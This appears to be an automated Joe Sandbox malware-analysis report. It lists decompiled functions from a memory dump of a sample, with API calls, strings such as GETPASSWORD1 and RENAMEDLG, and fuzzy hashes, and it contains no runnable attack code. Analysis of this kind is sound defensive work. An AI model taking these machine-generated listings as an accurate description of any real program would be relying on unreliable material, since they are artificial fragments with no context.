Opcode Fuzzy Hash: 222c2e2fd026fe256d5bc87831745935413ace9d7e8eb2e73144506ae8ef160e
Instruction Fuzzy Hash: A141807144021AA6CF23AF60CC41EEEBBADAF45390F11C466F858EB155EB74DAD08F60

Function 0037CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0037CD84

Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033

Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1

Strings

HIDE, xrefs: 0037CDC6
MIN, xrefs: 0037CDF5
<, xrefs: 0037CD68
MAX, xrefs: 0037CDD9

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: efc0e6e51bb3b490050ee1fd474fcbacd58773ac74d647f8d7ca46d4ada45b79
Instruction ID: 92502b3dccdba0436e7f5a49566d49f7586f568b6a0bfcc3705236e72029d8a6
Opcode Fuzzy Hash: efc0e6e51bb3b490050ee1fd474fcbacd58773ac74d647f8d7ca46d4ada45b79
Instruction Fuzzy Hash: AD3173769006099ADF37DB64CC41AEE73BCAB15351F01C56AE509E7180EBB89E848FA1

Function 0037AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0037AAD2
GetObjectW.GDI32(?,00000018,?), ref: 0037AB01
ReleaseDC.USER32(00000000,?), ref: 0037AB99

Strings

77, xrefs: 0037AB67
-7, xrefs: 0037AB32, 0037AB3F, 0037AB73, 0037AB7F

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ObjectRelease
String ID: -7$77
API String ID: 1429681911-1903741993
Opcode ID: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
Instruction ID: ea53bf1250d3ec79fab6327fb7ed571e237db98eccecb7e37b4017c5efd6d953
Opcode Fuzzy Hash: e9a28d38778e3459e8e98041ff15b2ef503305afd8fbebc4e3a716ca3f8b91df
Instruction Fuzzy Hash: 3C21E7B2148314AFD302AFA5DC48E6FBBFDFF89351F044819FA46D2120D631AA548B62

Function 0036B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0036B9B8

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

_wcschr.LIBVCRUNTIME ref: 0036B9D6
_wcschr.LIBVCRUNTIME ref: 0036B9E6

Strings

%c:\, xrefs: 0036B9AE

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 56de613b3d3299b1ad5c85fd43c3b772eb30d850f170b6f4530900311597b6aa
Instruction ID: 9d58c613aa123bef1580ceffecf3f80cf3bb0a74bd8e7ea492f703a3d719e8dc
Opcode Fuzzy Hash: 56de613b3d3299b1ad5c85fd43c3b772eb30d850f170b6f4530900311597b6aa
Instruction Fuzzy Hash: E901F56350431169DA327B75CC46D6BE7ECEE92770B40C80AF544DA086EB20D880C7B1

Function 0037B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

EndDialog.USER32(?,00000001), ref: 0037B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0037B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0037B304

Strings

xz;, xrefs: 0037B2E2
GETPASSWORD1, xrefs: 0037B289

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz;
API String ID: 445417207-2733714143
Opcode ID: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
Instruction ID: aaca5da2ead4615f1e82f3310eee6081177a73f72f05bc1357f94e1f6d03fa39
Opcode Fuzzy Hash: c5e05b726ddd47977b9a4f4bc4087ea411143576ea19b401430dbe0486a190be
Instruction Fuzzy Hash: C8110836900118BADB339A649C49FFFB77CEF09704F108420FA49F6580D7A8A9418771

Function 0037B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0037B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0037B712
DeleteObject.GDI32(00000000), ref: 0037B744
DeleteObject.GDI32(00000000), ref: 0037B767

Part of subcall function 0037A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
Part of subcall function 0037A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
Part of subcall function 0037A6C2: LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
Part of subcall function 0037A6C2: LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
Part of subcall function 0037A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
Part of subcall function 0037A6C2: GlobalLock.KERNEL32(00000000), ref: 0037A73E
Part of subcall function 0037A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0037A762
Part of subcall function 0037A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
Part of subcall function 0037A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
Part of subcall function 0037A6C2: GlobalFree.KERNEL32(00000000), ref: 0037A7CD

Strings

], xrefs: 0037B71A

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
Instruction ID: 7a7a3df8906a998b67ae55fb60b60262799672eaf4262e6c4021dd0291dd2517
Opcode Fuzzy Hash: 549f191ce5fb60ed2a9792c0ec0dbf2ca3a403bb7d018b1fd711f4e938ffda67
Instruction Fuzzy Hash: BD01D63650061567C73377745C09F7FBABE9FC1752F058015F948EB291DF298D055262

Function 0037D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

EndDialog.USER32(?,00000001), ref: 0037D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0037D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0037D675
SetDlgItemTextW.USER32(?,00000068), ref: 0037D684

Strings

RENAMEDLG, xrefs: 0037D618

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
Instruction ID: 26f95472457fc859ab6fd3e617bdf89ba183339bd339c2489b084fa1ba18f480
Opcode Fuzzy Hash: 77177dd0745cc5f97dce611145660a38449693f4d314a17bb79dc8fda1099f9a
Instruction Fuzzy Hash: 21012833284214BED2335F649E09F577B7CEF5AB05F528110F30AA20D1C7A6AA04D775

Function 00387E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00387E24,00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002), ref: 00387E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00387EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00387E24,00000000,?,00387DC4,00000000,0039C300,0000000C,00387F1B,00000000,00000002), ref: 00387EC9

Strings

mscoree.dll, xrefs: 00387E8C
CorExitProcess, xrefs: 00387E9E

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
Instruction ID: 7eb14ccea3bca64735d86088b063b4e1905a37e659de7895792277ed6dd0a381
Opcode Fuzzy Hash: 51365cbb093e2d6a4a4e89ff9f7c4a8c6777e934877558b71a94cd9eaa35a1d2
Instruction Fuzzy Hash: 4FF06871905208BBDB139FA5DC09BDEBFB9EF44711F1140AAF805A2250DB369E40CB90

Function 0036F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0036F2E4
GetProcAddress.KERNEL32(003A81C8,CryptUnprotectMemory), ref: 0036F2F4

Strings

Crypt32.dll, xrefs: 0036F2CE
CryptUnprotectMemory, xrefs: 0036F2EA
CryptProtectMemory, xrefs: 0036F2DE

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
Instruction ID: daa69d6c08429cdd73b4cd569cb064c86be681b67bea8b42274026684d3e31b0
Opcode Fuzzy Hash: 5798e71cf246aca09ccf341690c944b8d0a4d6ae59af9e6bfda00cf2d240b91b
Instruction Fuzzy Hash: 51E046B4950742AEDB239B38A849B82BAD86F04714F14C82EE0DAA3750DAB5D9808B50

Function 00382BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00382CA1
___AdjustPointer.LIBCMT ref: 00382CC4
_abort.LIBCMT ref: 00382D12
___AdjustPointer.LIBCMT ref: 00382D60

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: b9ed5c438fc79169bc836d2550e4382bcd1d7a1e389fbafd71f0029857a54b14
Instruction ID: 3b66058a598dc26359ee8f061d45583c1248038ad394f034436094c91f550bdb
Opcode Fuzzy Hash: b9ed5c438fc79169bc836d2550e4382bcd1d7a1e389fbafd71f0029857a54b14
Instruction Fuzzy Hash: 5551CF71600312AFDB2BAF14D845BBBB7B4BF54310F2545AAEC124B6A1E731AD44D790

Function 0038BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C

Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
_free.LIBCMT ref: 0038BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
Instruction ID: aa546c02a6206b82010c38a5808e7e187247a32b1a51df217a23ef8a7d333074
Opcode Fuzzy Hash: 0eb4aaf83f7348e5acec297865699de0bbdf29a5c2a00933275ee3f58f2d9860
Instruction Fuzzy Hash: D401D8B66013127F632336B65C8CC7BEB6DDEC2B903150199FA04C6211EF618D0186B0

Function 00389869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,003891AD,0038B188,?,00389813,00000001,00000364,?,00383F73,00000050,?,003A1030,00000200), ref: 0038986E
_free.LIBCMT ref: 003898A3
_free.LIBCMT ref: 003898CA
SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 003898D7
SetLastError.KERNEL32(00000000,?,003A1030,00000200), ref: 003898E0

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: ab882c305d8d1b84d98b785ccec4ae957e9f52960b5555adf6fc3d2f2401dc2b
Instruction ID: 5103ba57c9c7776e769bd194c278ddae35c715f96dda6e2da60edb2e5a95b2f0
Opcode Fuzzy Hash: ab882c305d8d1b84d98b785ccec4ae957e9f52960b5555adf6fc3d2f2401dc2b
Instruction Fuzzy Hash: 8F01F4371447036BD31377646C85B7B256EDBD2770B3A05B7F515A6292EE318D029322

Function 00370EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 003711CF: ResetEvent.KERNEL32(?), ref: 003711E1
Part of subcall function 003711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003711F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00370F21
CloseHandle.KERNEL32(?,?), ref: 00370F3B
DeleteCriticalSection.KERNEL32(?), ref: 00370F54
CloseHandle.KERNEL32(?), ref: 00370F60
CloseHandle.KERNEL32(?), ref: 00370F6C

Part of subcall function 00370FE4: WaitForSingleObject.KERNEL32(?,000000FF,00371206,?), ref: 00370FEA
Part of subcall function 00370FE4: GetLastError.KERNEL32(?), ref: 00370FF6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 77d7e65652f40ba43c38e29fbe32aaf234c3e7235f5935a947acfe95dcd41fb0
Instruction ID: 2540cb79de1d536b33339be99f21791785d6b2a5ca31c59d679d19df51c4339d
Opcode Fuzzy Hash: 77d7e65652f40ba43c38e29fbe32aaf234c3e7235f5935a947acfe95dcd41fb0
Instruction Fuzzy Hash: 070152B2100744EFC7339B64DC85BC6FBADFB08710F00492AF16B52160C7767A44CA50

Function 0038C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0038C817

Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4

_free.LIBCMT ref: 0038C829
_free.LIBCMT ref: 0038C83B
_free.LIBCMT ref: 0038C84D
_free.LIBCMT ref: 0038C85F

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
Instruction ID: 46e246b9cff99683a1bcdb29ba8f61ddc732b224907f67ebed3d41024a568e75
Opcode Fuzzy Hash: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
Instruction Fuzzy Hash: EAF01232954344ABC623FB68E485C1673EEAB00714B95289AF108DB652CB71FC80CB64

Function 00371FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00371FE5
_wcslen.LIBCMT ref: 00371FF6
_wcslen.LIBCMT ref: 00372006
_wcslen.LIBCMT ref: 00372014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: a7fcb2cf831586f69406ba9288cc927d58d39d62a38fb42a81996cab2c723b5d
Instruction ID: 500c147e3d789b1729b36346a75a0682b44d037ee8d599e7130045a8b6348dae
Opcode Fuzzy Hash: a7fcb2cf831586f69406ba9288cc927d58d39d62a38fb42a81996cab2c723b5d
